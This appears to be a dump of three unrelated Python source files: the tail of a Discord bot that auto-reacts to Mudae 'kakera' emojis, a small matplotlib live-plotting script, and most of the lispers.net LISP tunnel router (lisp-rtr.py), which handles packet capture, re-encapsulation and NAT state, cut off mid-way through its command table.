#print(r)
reactionid = int(r['user_id'])
rchannelid = r["channel_id"]
rmessageid = r["message_id"]
rguildid = r["guild_id"]
emoji = r["emoji"]["name"]
emojiid = r["emoji"]['id']
if int(rchannelid) not in mhids:
# Not a channel we work in.
return
if int(rchannelid) not in channel_settings:
mhids.remove(int(rchannelid))
logger.error(f"Could not find settings for {rchannelid}, please trigger the '$settings' command in the server and run the bot again.")
return
snipe_delay = channel_settings[int(rchannelid)]['kak_snipe'][1]
if reactionid == mudae and int(rchannelid) in mhids:
if emojiid != None and emoji == "kakeraP" and (snipe_delay == 0 or msg_buf[rmessageid]['rolled']):
sendEmoji = emoji + ":" +emojiid
react_m = bot.getMessage(rchannelid, rmessageid).json()[0]['embeds'][0]
time.sleep(1)
bot.addReaction(rchannelid,rmessageid,sendEmoji)
if emojiid != None and emoji.lower() in KakeraVari:
sendEmoji = emoji + ":" +emojiid
react_m = bot.getMessage(rchannelid, rmessageid).json()[0]['embeds'][0]
cooldown = kakera_wall.get(rguildid,0) - time.time()
if cooldown <= 1:
logger.info(f"{emoji} was detected on {react_m['author']['name']}:{get_serial(react_m['description'])} in Server: {rguildid}")
time.sleep(snipe_delay)
bot.addReaction(rchannelid,rmessageid,sendEmoji)
else:
logger.info(f"Skipped {emoji} found on {react_m['author']['name']}:{get_serial(react_m['description'])} in Server: {rguildid}")
return
warn_check = mudae_warning(rchannelid)
kakerawallwait = wait_for(bot,lambda r: warn_check(r) and 'kakera' in r.parsed.auto()['content'],timeout=5)
if kakerawallwait != None:
time_to_wait = waitk_finder.findall(kakerawallwait['content'])
else:
time_to_wait = []
if len(time_to_wait):
timegetter = (int(time_to_wait[0][0] or "0")*60+int(time_to_wait[0][1] or "0"))*60
print(f"{timegetter} for kakera_wall was set for Server : {rguildid}")
kakera_wall[rguildid] = timegetter + time.time()
if emojiid == None:
if emoji in eventlist:
print(f"{emoji} was detected in Server: {rguildid}")
time.sleep(snipe_delay)
bot.addReaction(rchannelid,rmessageid,emoji)
global ready
if resp.event.ready_supplemental and not ready:
ready = bot.gateway.READY
user = bot.gateway.session.user
guilds = bot.gateway.session.settings_ready['guilds']
chs = set(str(mhid) for mhid in mhids)
for gid, guild in guilds.items():
for matched_channel in (set(guild['channels'].keys()) & chs):
# Find associated guild ID to a monitored channel, then get settings
msg = get_server_settings(gid,matched_channel)
c_settings = parse_settings_message(msg)
channel_settings[int(matched_channel)] = c_settings
if settings['pkmrolling'].lower().strip() == "true":
p = threading.Thread(target=poke_roll,args=[mhids[0]])
p.start()
if settings['rolling'].lower().strip() == "true":
for chid in mhids:
waifus = threading.Timer(10.0,waifu_roll,args=[chid])
waifus.start()
def empty(*args,**kwargs):
return
#bot.sendMessage = empty
bot.gateway.run(auto_reconnect=True)
|
dataplotter.py
|
"""Run this script to display the data output during a run."""
import pickle
import threading
import matplotlib.pyplot as plt
import numpy as np
def run(filename):
with open(filename, "rb") as f:
plots = pickle.load(f)
axes = []
lines = []
for p in plots:
plt.figure()
plt.title(p)
if "(log)" in p:
plt.yscale("log")
axes += [plt.gca()]
lines += [plt.plot(plots[p])[0]]
while True:
with open(filename, "rb") as f:
plots = pickle.load(f)
for i, p in enumerate(plots):
lines[i].set_data(np.arange(len(plots[p])), plots[p])
axes[i].relim()
axes[i].autoscale_view()
plt.draw()
plt.pause(10)
def run_thread(filename):
p = threading.Thread(target=run, args=(filename,))
p.daemon = True
p.start()
if __name__ == "__main__":
run("HF_plots.pkl")
|
lisp-rtr.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-rtr.py
#
# This file performs LISP Reencapsualting Tunnel Router (RTR) functionality.
#
# -----------------------------------------------------------------------------
import lisp
import lispconfig
import socket
import time
import select
import threading
import pcappy
import os
import copy
import commands
#------------------------------------------------------------------------------
#
# Global data structures relative to the lisp-itr process.
#
lisp_send_sockets = [None, None, None]
lisp_trace_listen_socket = None
lisp_ipc_listen_socket = None
lisp_ipc_punt_socket = None
lisp_ephem_listen_socket = None
lisp_ephem_port = lisp.lisp_get_ephemeral_port()
lisp_raw_socket = None
lisp_raw_v6_socket = None
lisp_periodic_timer = None
lisp_threads = []
#------------------------------------------------------------------------------
#
# lisp_rtr_show_command
#
# Display state in an RTR.
#
def lisp_rtr_show_command(parameter):
global lisp_threads
return(lispconfig.lisp_itr_rtr_show_command(parameter, "RTR",
lisp_threads))
#enddef
#
# lisp_rtr_show_command_dns
#
# Display state in an RTR but pass in boolean to not do a DNS lookup.
#
def lisp_rtr_show_command_dns(parameter):
global lisp_threads
return(lispconfig.lisp_itr_rtr_show_command(parameter, "RTR", lisp_threads,
True))
#enddef
#
# lisp_rtr_show_keys_command
#
# Call lispconfig.lisp_show_crypto_list().
#
def lisp_rtr_show_keys_command(parameter):
return(lispconfig.lisp_show_crypto_list("RTR"))
#enddef
#
# lisp_rtr_database_mapping_command
#
# Add database-mapping entry so RTR can sign Map-Requests.
#
def lisp_rtr_database_mapping_command(kv_pair):
lispconfig.lisp_database_mapping_command(kv_pair)
#enddef
#
# lisp_rtr_glean_mapping_command
#
# Add a configured glean_mapping to the lisp_glean_mapping array.
#
def lisp_rtr_glean_mapping_command(kv_pair):
entry = { "rloc-probe" : False }
for kw in kv_pair.keys():
value = kv_pair[kw]
if (kw == "instance-id"):
v = value.split("-")
entry["instance-id"] = [0, 0]
if (len(v) == 1):
entry["instance-id"][0] = int(v[0])
entry["instance-id"][1] = int(v[0])
else:
entry["instance-id"][0] = int(v[0])
entry["instance-id"][1] = int(v[1])
#endif
#endif
if (kw == "eid-prefix"):
eid = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
eid.store_prefix(value)
entry["eid-prefix"] = eid
#endif
if (kw == "rloc-prefix"):
rloc = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
rloc.store_prefix(value)
entry["rloc-prefix"] = rloc
#endif
if (kw == "rloc-probe"):
entry["rloc-probe"] = (value == "yes")
#endif
#endfor
#
# Check if entry already exists. If so, just return.
#
for e in lisp.lisp_glean_mappings:
if (e.has_key("eid-prefix") ^ entry.has_key("eid-prefix")): continue
if (e.has_key("eid-prefix") and entry.has_key("eid-prefix")):
old = e["eid-prefix"]
new = entry["eid-prefix"]
if (old.is_exact_match(new) == False): continue
#endif
if (e.has_key("rloc-prefix") ^ entry.has_key("rloc-prefix")): continue
if (e.has_key("rloc-prefix") and entry.has_key("rloc-prefix")):
old = e["rloc-prefix"]
new = entry["rloc-prefix"]
if (old.is_exact_match(new) == False): continue
#endif
if (e.has_key("instance-id") ^ entry.has_key("instance-id")): continue
if (e.has_key("instance-id") and entry.has_key("instance-id")):
old = e["instance-id"]
new = entry["instance-id"]
if (old != new): continue
#endif
#
# Found a match. Do not append existing entry to array.
#
return
#endfor
#
# Add dictionary array to array.
#
lisp.lisp_glean_mappings.append(entry)
#enddef
#
# lisp_rtr_show_rloc_probe_command
#
# Display RLOC-probe list state in an RTR.
#
def lisp_rtr_show_rloc_probe_command(parameter):
return(lispconfig.lisp_itr_rtr_show_rloc_probe_command("RTR"))
#enddef
#
# lisp_fix_rloc_encap_state_entry
#
# Examine one map-cache entry.
#
def lisp_fix_rloc_encap_state_entry(mc, parms):
lisp_sockets, rloc, port, hostname = parms
addr = "{}:{}".format(rloc.print_address_no_iid(), port)
eid = lisp.green(mc.print_eid_tuple(), False)
msg = "Changed '{}' translated address:port to {} for EID {}, {} {}". \
format(hostname, lisp.red(addr, False), eid, "{}", "{}")
for rloc_entry in mc.rloc_set:
if (rloc_entry.rle):
for rle_node in rloc_entry.rle.rle_nodes:
if (rle_node.rloc_name != hostname): continue
rle_node.store_translated_rloc(rloc, port)
old_addr = rle_node.address.print_address_no_iid() + ":" + \
str(rle_node.translated_port)
lisp.lprint(msg.format("RLE", old_addr))
#endfor
#endif
if (rloc_entry.rloc_name != hostname): continue
#
# Update lisp-crypto encap array. Put keys in new dictionary array
# location since translated address and port changed. We don't want
# to rekey because of a NAT change.
#
old_addr = rloc_entry.rloc.print_address_no_iid() + ":" + \
str(rloc_entry.translated_port)
if (lisp.lisp_crypto_keys_by_rloc_encap.has_key(old_addr)):
keys = lisp.lisp_crypto_keys_by_rloc_encap[old_addr]
lisp.lisp_crypto_keys_by_rloc_encap[addr] = keys
#endif
#
# Update translated information with new information.
#
rloc_entry.delete_from_rloc_probe_list(mc.eid, mc.group)
rloc_entry.store_translated_rloc(rloc, port)
rloc_entry.add_to_rloc_probe_list(mc.eid, mc.group)
lisp.lprint(msg.format("RLOC", old_addr))
#
# Trigger RLOC-probe if enabled.
#
if (lisp.lisp_rloc_probing):
seid = None if (mc.group.is_null()) else mc.eid
deid = mc.eid if (mc.group.is_null()) else mc.group
lisp.lisp_send_map_request(lisp_sockets, 0, seid, deid, rloc_entry)
#endif
#endfor
#
# Write change to external data-plane.
#
lisp.lisp_write_ipc_map_cache(True, mc)
return(True, parms)
#enddef
#
# lisp_fix_rloc_encap_state_walk
#
# Walk main cache and source-cache for each entry to handle multicast entries.
#
def lisp_fix_rloc_encap_state_walk(mc, parms):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_fix_rloc_encap_state_entry(mc, parms))
if (mc.source_cache == None): return(True, parms)
#
# There is (source, group) state so walk all sources for this group
# entry.
#
mc.source_cache.walk_cache(lisp_fix_rloc_encap_state_entry, parms)
return(True, parms)
#enddef
#
# lisp_fix_rloc_encap_state
#
# Walk map-cache looking for supplied RLOC and change its encap-port to
# the supplied port passed to this function.
#
def lisp_fix_rloc_encap_state(sockets, hostname, rloc, port):
lisp.lisp_map_cache.walk_cache(lisp_fix_rloc_encap_state_walk,
[sockets, rloc, port, hostname])
return
#enddef
#
# lisp_rtr_data_plane
#
# Capture a LISP encapsulated packet, decap it, process inner header, and
# re-encapsulated it.
#
def lisp_rtr_data_plane(lisp_packet, thread_name):
global lisp_send_sockets, lisp_ephem_prot, lisp_data_packet
global lisp_raw_socket, lisp_raw_v6_socket
global lisp_trace_listen_socket
packet = lisp_packet
is_lisp_packet = packet.is_lisp_packet(packet.packet)
#
# Check RLOC-probe Map-Request. We need to grab the TTL from IP header.
#
if (is_lisp_packet == False):
orig_packet = packet.packet
pkt, source, port, ttl = lisp.lisp_is_rloc_probe(orig_packet, -1)
if (orig_packet != pkt):
if (source == None): return
lisp.lisp_parse_packet(lisp_send_sockets, pkt, source, port, ttl)
return
#endif
#endif
#
# First check if we are assembling IPv4 fragments.
#
packet.packet = lisp.lisp_reassemble(packet.packet)
if (packet.packet == None): return
#
# We need to cache the input encapsualted packet as well as the output
# encapsulated packet.
#
if (lisp.lisp_flow_logging): packet = copy.deepcopy(packet)
#
# If we are a PITR as well, we are receiving non encapsulated packets
# via return packets from doing LISP-NAT. Print some useful header fields
# and strip outer headers. Strip outer headers if LISP encapsulated packet
# and start inner header forwarding logic.
#
if (is_lisp_packet):
if (packet.decode(True, None, lisp.lisp_decap_stats) == None): return
packet.print_packet("Receive-({})".format(thread_name), True)
packet.strip_outer_headers()
else:
if (packet.decode(False, None, None) == None): return
packet.print_packet("Receive-({})".format(thread_name), False)
#endif
#
# If instance-id is 0xffffff, this is a Info-Request packet encapsulated
# to port 4341. We need to store the source port and source RLOC for
# NAT-traversal reasons.
#
# We don't need to send an Info-Reply from the 4341 data port. There is no
# information the xTR needs. It has the translated address from the
# map-server, and the NAT is ready for packets from port 4341 since we
# received this Info-Request.
#
if (packet.lisp_header.get_instance_id() == 0xffffff):
header = lisp.lisp_control_header()
header.decode(packet.packet)
if (header.is_info_request()):
info = lisp.lisp_info()
info.decode(packet.packet)
info.print_info()
#
# Store/refresh NAT state and Fix map-cache entries if there was
# a change.
#
h = info.hostname if (info.hostname != None) else ""
s = packet.outer_source
p = packet.udp_sport
if (lisp.lisp_store_nat_info(h, s, p)):
lisp_fix_rloc_encap_state(lisp_send_sockets, h, s, p)
#endif
else:
source = packet.outer_source.print_address_no_iid()
ttl = packet.outer_ttl
packet = packet.packet
if (lisp.lisp_is_rloc_probe_request(packet[28]) == False and
lisp.lisp_is_rloc_probe_reply(packet[28]) == False): ttl = -1
packet = packet[28::]
lisp.lisp_parse_packet(lisp_send_sockets, packet, source, 0, ttl)
#endif
return
#endif
#
# Packets are arriving on pcap interface. Need to check if another data-
# plane is running. If so, don't deliver duplicates.
#
if (lisp.lisp_ipc_data_plane):
lisp.dprint("Drop packet, external data-plane active")
return
#endif
#
# Increment global stats.
#
if (is_lisp_packet):
lisp.lisp_decap_stats["good-packets"].increment(len(packet.packet))
#endif
#
# Process inner header (checksum and decrement ttl).
#
if (packet.inner_dest.is_mac()):
packet.packet = lisp.lisp_mac_input(packet.packet)
if (packet.packet == None): return
packet.encap_port = lisp.LISP_VXLAN_DATA_PORT
elif (packet.inner_version == 4):
packet.packet = lisp.lisp_ipv4_input(packet.packet)
if (packet.packet == None): return
packet.inner_ttl = packet.outer_ttl
elif (packet.inner_version == 6):
packet.packet = lisp.lisp_ipv6_input(packet)
if (packet.packet == None): return
packet.inner_ttl = packet.outer_ttl
else:
lisp.dprint("Cannot parse inner packet header")
return
#endif
#
# Process decap node trace function.
#
if (packet.is_trace()):
if (lisp.lisp_trace_append(packet, ed="decap") == False): return
packet.outer_source.afi = lisp.LISP_AFI_NONE
packet.outer_dest.afi = lisp.LISP_AFI_NONE
#endif
#
# Should we glean source information from packet and add it to the
# map-cache??
#
allow, nil = lisp.lisp_allow_gleaning(packet.inner_source,
packet.outer_source)
if (allow):
lisp.lisp_glean_map_cache(packet.inner_source, packet.outer_source,
packet.udp_sport)
#endif
gleaned_dest, nil = lisp.lisp_allow_gleaning(packet.inner_dest, None)
packet.gleaned_dest = gleaned_dest
#
# Do map-cache lookup. If no entry found, send Map-Request.
#
mc = lisp.lisp_map_cache_lookup(packet.inner_source, packet.inner_dest)
#
# Map-cache lookup miss. Do not send Map-Request to mapping system if
# dest-EID is configured to be gleaned. We want to give preference to
# the gleaned mapping and not the mapping in the mapping system.
#
if (mc == None and gleaned_dest):
lisp.lprint("Suppress Map-Request for gleaned EID {}".format( \
lisp.green(packet.inner_dest.print_address(), False)))
return
#endif
#
# Check if we are doing secondary-instance-ids only when we have a
# map-cache entry in the IID that is possibly a non-LISP site.
#
if (mc and (mc.action == lisp.LISP_NATIVE_FORWARD_ACTION or
mc.eid.address == 0)):
db = lisp.lisp_db_for_lookups.lookup_cache(packet.inner_source, False)
if (db and db.secondary_iid):
dest_eid = packet.inner_dest
dest_eid.instance_id = db.secondary_iid
mc = lisp.lisp_map_cache_lookup(packet.inner_source, dest_eid)
#endif
#endif
if (mc == None or mc.action == lisp.LISP_SEND_MAP_REQUEST_ACTION):
if (lisp.lisp_rate_limit_map_request(packet.inner_source,
packet.inner_dest)): return
lisp.lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
packet.inner_source, packet.inner_dest, None)
if (packet.is_trace()):
s = lisp_trace_listen_socket
r = "map-cache miss"
lisp.lisp_trace_append(packet, reason=r, lisp_socket=s)
#endif
return
#endif
#
# Send Map-Request to see if there is a RLOC change or to refresh an
# entry that is about to time out.
#
if (mc and mc.is_active() and mc.has_ttl_elapsed() and
gleaned_dest == False):
lisp.lprint("Refresh map-cache entry {}".format( \
lisp.green(mc.print_eid_tuple(), False)))
lisp.lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
packet.inner_source, packet.inner_dest, None)
#endif
#
# Update stats for entry. Stats per RLOC is done in lisp_mapping.select_
# rloc().
#
mc.stats.increment(len(packet.packet))
#
# Encapsulate or native forward packet.
#
dest_rloc, dest_port, nonce, action, rle, rloc_entry = \
mc.select_rloc(packet, None)
if (dest_rloc == None and rle == None):
if (action == lisp.LISP_NATIVE_FORWARD_ACTION):
lisp.dprint("Natively forwarding")
packet.send_packet(lisp_raw_socket, packet.inner_dest)
if (packet.is_trace()):
s = lisp_trace_listen_socket
r = "not an EID"
lisp.lisp_trace_append(packet, reason=r, lisp_socket=s)
#endif
return
#endif
r = "No reachable RLOCs found"
lisp.dprint(r)
if (packet.is_trace()):
s = lisp_trace_listen_socket
lisp.lisp_trace_append(packet, reason=r, lisp_socket=s)
#endif
return
#endif
if (dest_rloc and dest_rloc.is_null()):
lisp.dprint("Drop action RLOC found")
if (packet.is_trace()):
s = lisp_trace_listen_socket
r = "drop action"
lisp.lisp_trace_append(packet, reason=r, lisp_socket=s)
#endif
return
#endif
#
# Setup outer header for either unicast or multicast transmission..
#
packet.outer_tos = packet.inner_tos
packet.outer_ttl = packet.inner_ttl
#
# Do unicast encapsulation.
#
if (dest_rloc):
packet.encap_port = dest_port
if (dest_port == 0): packet.encap_port = lisp.LISP_DATA_PORT
packet.outer_dest.copy_address(dest_rloc)
version = packet.outer_dest.afi_to_version()
packet.outer_version = version
source_rloc = lisp.lisp_myrlocs[0] if (version == 4) else \
lisp.lisp_myrlocs[1]
packet.outer_source.copy_address(source_rloc)
if (packet.is_trace()):
s = lisp_trace_listen_socket
if (lisp.lisp_trace_append(packet, rloc_entry=rloc_entry,
lisp_socket=s) == False): return
#endif
#
# Encode new LISP, UDP, and outer header.
#
if (packet.encode(nonce) == None): return
if (len(packet.packet) <= 1500): packet.print_packet("Send", True)
#
# Send out on raw socket.
#
raw_socket = lisp_raw_v6_socket if version == 6 else lisp_raw_socket
packet.send_packet(raw_socket, packet.outer_dest)
elif (rle):
#
# Do replication of RLE is returned.
#
orig_len = len(packet.packet)
for node in rle.rle_forwarding_list:
packet.outer_dest.copy_address(node.address)
packet.encap_port = lisp.LISP_DATA_PORT if \
node.translated_port == 0 else node.translated_port
version = packet.outer_dest.afi_to_version()
packet.outer_version = version
source_rloc = lisp.lisp_myrlocs[0] if (version == 4) else \
lisp.lisp_myrlocs[1]
packet.outer_source.copy_address(source_rloc)
if (packet.is_trace()):
s = lisp_trace_listen_socket
r = "replicate"
if (lisp.lisp_trace_append(packet, reason=r, lisp_socket=s) \
== False): return
#endif
if (packet.encode(None) == None): return
packet.print_packet("Replicate-to-L{}".format(node.level), True)
packet.send_packet(lisp_raw_socket, packet.outer_dest)
#
# We need to strip the encapsulation header so we can add a new
# one for the next replication.
#
strip_len = len(packet.packet) - orig_len
packet.packet = packet.packet[strip_len::]
if (lisp.lisp_flow_logging): packet = copy.deepcopy(packet)
#endfor
#endif
#
# Don't need packet structure anymore.
#
del(packet)
return
#enddef
#
# lisp_rtr_worker_thread
#
# This function runs for each thread started.
#
def lisp_rtr_worker_thread(lisp_thread):
lisp.lisp_set_exception()
while (True):
#
# Dequeue packet from pcap's enqueue.
#
packet = lisp_thread.input_queue.get()
#
# Count input packets and bytes.
#
lisp_thread.input_stats.increment(len(packet))
#
# Use pre-defined packet data structure, store packet buffer in it.
#
lisp_thread.lisp_packet.packet = packet
#
# Decap and encap, go, go, go.
#
lisp_rtr_data_plane(lisp_thread.lisp_packet, lisp_thread.thread_name)
#endwhile
return
#enddef
#
# lisp_triage
#
# Decide which RTR thread should process packet. Do a modulus on the timestamp
# to randomly have a single thread process a received packet.
#
def lisp_triage(thread):
seed = (time.time() % thread.number_of_pcap_threads)
return(int(seed) == thread.thread_number)
#enddef
#
# lisp_rtr_pcap_process_packet
#
# Receive LISP encapsulated packet from pcap.loop(). IPC it to ourselves so
# main thread can get access to lisp.lisp_map_cache.
#
def lisp_rtr_pcap_process_packet(parms, not_used, packet):
if (lisp_triage(parms[1]) == False): return
device = parms[0]
lisp_thread = parms[1]
use_workers = lisp_thread.number_of_worker_threads
lisp_thread.input_stats.increment(len(packet))
#
# Jump over MAC header if packet received on interface. There is a 4-byte
# internal header in any case (loopback interfaces will have a 4 byte
# header)..
#
offset = 4 if device == "lo0" else (14 if lisp.lisp_is_macos() else 16)
packet = packet[offset::]
#
# If we are using worker threads, queue packet so they can process packet.
#
if (use_workers):
index = lisp_thread.input_stats.packet_count % use_workers
index = index + (len(lisp_threads) - use_workers)
thread = lisp_threads[index]
thread.input_queue.put(packet)
else:
lisp_thread.lisp_packet.packet = packet
lisp_rtr_data_plane(lisp_thread.lisp_packet, lisp_thread.thread_name)
#endif
return
#enddef
#
# lisp_rtr_pcap_thread
#
# Receive LISP encapsulated packet from pcap.
#
def lisp_rtr_pcap_thread(lisp_thread):
lisp.lisp_set_exception()
if (lisp.lisp_myrlocs[0] == None): return
device = "lo0" if lisp.lisp_is_macos() else "any"
pcap = pcappy.open_live(device, 9000, 0, 100)
#
# If "lisp-nat = yes" is configured, then a PETR is co-located with this
# RTR functionality. We need to pcap *all* packets (0.0.0.0/0 and 0::/0).
#
lisp_nat = commands.getoutput("egrep 'lisp-nat = yes' ./lisp.config")
lisp_nat = (lisp_nat != "" and lisp_nat[0] == " ")
pfilter = "(dst host "
afilter = ""
for addr in lisp.lisp_get_all_addresses():
pfilter += "{} or ".format(addr)
afilter += "{} or ".format(addr)
#endif
pfilter = pfilter[0:-4]
pfilter += ") and ((udp dst port 4341 or 8472 or 4789) or "
pfilter += "(proto 17 and (ip[6]&0xe0 == 0x20 or " + \
"(ip[6]&0xe0 == 0 and ip[7] != 0))))"
#
# For RLOC-probe messages that come via pcap interface so we have the
# IP header to grab the TTL.
#
afilter = afilter[0:-4]
pfilter += (" or (not (src host {}) and " + \
"((udp src port 4342 and ip[28] == 0x28) or " + \
"(udp dst port 4342 and ip[28] == 0x12)))").format(afilter)
if (lisp_nat):
pfilter += " or (dst net 0.0.0.0/0 and not (host {}))".format(afilter)
#endif
lisp.lprint("Capturing packets for: '{}'".format(pfilter))
pcap.filter = pfilter
#
# Enter receive loop.
#
pcap.loop(-1, lisp_rtr_pcap_process_packet, [device, lisp_thread])
return
#enddef
#
# lisp_rtr_process_timer
#
# Call general timeout routine to process the RTR map-cache.
#
def lisp_rtr_process_timer():
lisp.lisp_set_exception()
#
# Remove nonce entries from crypto-list.
#
for keys in lisp.lisp_crypto_keys_by_nonce.values():
for key in keys: del(key)
#endfor
lisp.lisp_crypto_keys_by_nonce.clear()
lisp.lisp_crypto_keys_by_nonce = {}
#
# Walk map-cache.
#
lisp.lisp_timeout_map_cache(lisp.lisp_map_cache)
#
# Clear the LISP-Trace cache so we can optimize memory usage. There is only
# a one-time use for the cahced entries.
#
lisp.lisp_rtr_nat_trace_cache.clear()
lisp.lisp_rtr_nat_trace_cache = {}
#
# Restart periodic timer.
#
lisp_periodic_timer = threading.Timer(60, lisp_rtr_process_timer, [])
lisp_periodic_timer.start()
return
#enddef
#
# lisp_rtr_startup
#
# Intialize this LISP RTR process. This function returns no values.
#
def lisp_rtr_startup():
global lisp_ipc_listen_socket, lisp_send_sockets, lisp_ephem_listen_socket
global lisp_raw_socket, lisp_raw_v6_socket, lisp_threads
global lisp_ipc_punt_socket, lisp_trace_listen_socket
lisp.lisp_i_am("rtr")
lisp.lisp_set_exception()
lisp.lisp_print_banner("RTR starting up")
#
# Get local address for source RLOC for encapsulation.
#
if (lisp.lisp_get_local_addresses() == False): return(False)
#
# Open network send socket and internal listen socket. For an RTR, that
# may be behind a NAT, all Map-Requests are sent with the ephemeral port
# so the Map-Request port and the ECM port will be the same.
#
address = "0.0.0.0" if lisp.lisp_is_raspbian() else "0::0"
lisp_ephem_listen_socket = lisp.lisp_open_listen_socket(address,
str(lisp_ephem_port))
lisp_ipc_listen_socket = lisp.lisp_open_listen_socket("", "lisp-rtr")
lisp_ipc_punt_socket = lisp.lisp_open_listen_socket("", "lispers.net-itr")
lisp_send_sockets[0] = lisp_ephem_listen_socket
# lisp_send_sockets[0] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV4)
lisp_send_sockets[1] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV6)
lisp_send_sockets[2] = lisp_ipc_listen_socket
#
# Open up raw socket so we can send with IP headers after decapsulation.
# There is a special case where the RTR's lisp_send_sockets array is of
# size 4 since we need to pass the raw socket through the lisp.py module
# to send a data encapsulated RLOC-probe to an ETR that sits behind a NAT.
# The test is in lisp_send_map_request() for this. This is the case in
# ETRs as well. All other components use an array size of 3 modulo.
#
lisp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.IPPROTO_RAW)
lisp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
lisp_send_sockets.append(lisp_raw_socket)
#
# Open up a listen socket on the LISP-Trace port so the RTR can cache
# translated RLOC information from an ltr client program.
#
lisp_trace_listen_socket = lisp.lisp_open_listen_socket("0.0.0.0",
str(lisp.LISP_TRACE_PORT))
if (lisp.lisp_is_raspbian() == False):
lisp_raw_v6_socket = socket.socket(socket.AF_INET6, socket.SOCK_RAW,
socket.IPPROTO_UDP)
#endif
pcap_threads = os.getenv("LISP_PCAP_THREADS")
pcap_threads = 1 if (pcap_threads == None) else int(pcap_threads)
worker_threads = os.getenv("LISP_WORKER_THREADS")
worker_threads = 0 if (worker_threads == None) else int(worker_threads)
#
# Setup packet capture.
#
for i in range(pcap_threads):
t = lisp.lisp_thread("pcap-{}".format(i))
t.thread_number = i
t.number_of_pcap_threads = pcap_threads
t.number_of_worker_threads = worker_threads
lisp_threads.append(t)
threading.Thread(target=lisp_rtr_pcap_thread, args=[t]).start()
#endif
#
# Start worker threads. If you want to change the number of them, only
# this constant needs changing.
#
for i in range(worker_threads):
t = lisp.lisp_thread("worker-{}".format(i))
lisp_threads.append(t)
threading.Thread(target=lisp_rtr_worker_thread, args=[t]).start()
#endfor
#
# Load map-cache from checkpoint file before we start writing to it.
#
lisp.lisp_load_checkpoint()
#
# Should we load-split pings?
#
lisp.lisp_load_split_pings = (os.getenv("LISP_LOAD_SPLIT_PINGS") != None)
#
# Start map-cache timeout timer.
#
lisp_periodic_timer = threading.Timer(60, lisp_rtr_process_timer, [])
lisp_periodic_timer.start()
return(True)
#enddef
#
# lisp_rtr_shutdown
#
# Shut down this process.
#
def lisp_rtr_shutdown():
#
# Close sockets.
#
lisp.lisp_close_socket(lisp_send_sockets[0], "")
lisp.lisp_close_socket(lisp_send_sockets[1], "")
lisp.lisp_close_socket(lisp_ipc_listen_socket, "lisp-rtr")
lisp.lisp_close_socket(lisp_ephem_listen_socket, "")
lisp.lisp_close_socket(lisp_trace_listen_socket, "")
lisp.lisp_close_socket(lisp_ipc_punt_socket, "lispers.net-itr")
lisp_raw_socket.close()
return
#enddef
#
# lisp_rtr_map_resolver_command
#
# Call lispconfig.lisp_map_resolver_command and set "test-mr" timer.
#
def lisp_rtr_map_resolver_command(kv_pair):
global lisp_send_sockets
global lisp_ephem_port
lispconfig.lisp_map_resolver_command(kv_pair)
if (lisp.lisp_test_mr_timer == None or
lisp.lisp_test_mr_timer.is_alive() == False):
lisp.lisp_test_mr_timer = threading.Timer(2, lisp.lisp_test_mr,
[lisp_send_sockets, lisp_ephem_port])
lisp.lisp_test_mr_timer.start()
#endif
return
#enddef
#
# lisp_rtr_xtr_command
#
# Call lispconfig.lisp_xtr_command() but pass socket parameters to starting
# the RLOC-probing timer if "rloc-probing = yes".
#
def lisp_rtr_xtr_command(kv_pair):
global lisp_ephem_listen_socket, lisp_raw_socket, lisp_ephem_port
rloc_probing = lisp.lisp_rloc_probing
#
# Execute command.
#
lispconfig.lisp_xtr_command(kv_pair)
#
# Trigger if "rloc-probing = yes" just happened and it was previously
# set to "no".
#
if (rloc_probing == False and lisp.lisp_rloc_probing):
lisp_sockets = [lisp_ephem_listen_socket, lisp_ephem_listen_socket,
None, lisp_raw_socket]
lisp.lisp_start_rloc_probe_timer(1, lisp_sockets)
entry = { "type" : "itr-crypto-port", "port" : lisp_ephem_port }
lisp.lisp_write_to_dp_socket(entry)
#endif
#
# Write to external data-plane if enabled.
#
lisp.lisp_ipc_write_xtr_parameters(lisp.lisp_debug_logging,
lisp.lisp_data_plane_logging)
return
#enddef
#
# RTR commands processed by this process.
#
lisp_rtr_commands = {
"lisp xtr-parameters" : [lisp_rtr_xtr_command, {
"rloc-probing" : [True, "yes", "no"],
"nonce-echoing" : [True, "yes", "no"],
"data-plane-security" : [True, "yes", "no"],
"data-plane-logging" : [True, "yes", "no"],
"frame-logging" : [True, "yes", "no"],
"flow-logging" : [True, "yes", "no"],
"nat-traversal" : [True, "yes", "no"],
"checkpoint-map-cache" : [True, "yes", "no"],
"ipc-data-plane" : [True, "yes", "no"],
"decentralized-push-xtr" : [True, "yes", "no"],
"decentralized-pull-xtr-modulus" : [True, 1, 0xff],
"decentralized-pull-xtr-dns-suffix" : [True],
"register-reachable-rtrs" : [True, "yes", "no"],
"program-hardware" : [True, "yes", "no"] }],
"lisp interface" : [lispconfig.lisp_interface_command, {
"interface-name" : [True],
"device" : [True],
"instance-id" : [True, 0, 0xffffffff],
"dynamic-eid" : [True],
"dynamic-eid-device" : [True],
"lisp-nat" : [True, "yes", "no"],
"dynamic-eid-timeout" : [True, 0, 0xff] }],
"lisp map-resolver" : [lisp_rtr_map_resolver_command, {
"mr-name" : [True],
"ms-name" : [True],
"dns-name" : [True],
"address" : [True] }],
"lisp map-cache" : [lispconfig.lisp_map_cache_command, {
"prefix" : [],
"mr-name" : [True],
"ms-name" : [True],
"instance-id" : [True, 0, 0xffffffff],
"eid-prefix" : [True],
"group-prefix" : [True],
"send-map-request" : [True, "yes", "no"],
"rloc" : [],
"rloc-record-name" : [True],
"rle-name" : [True],
"elp-name" : [True],
"address" : [True],
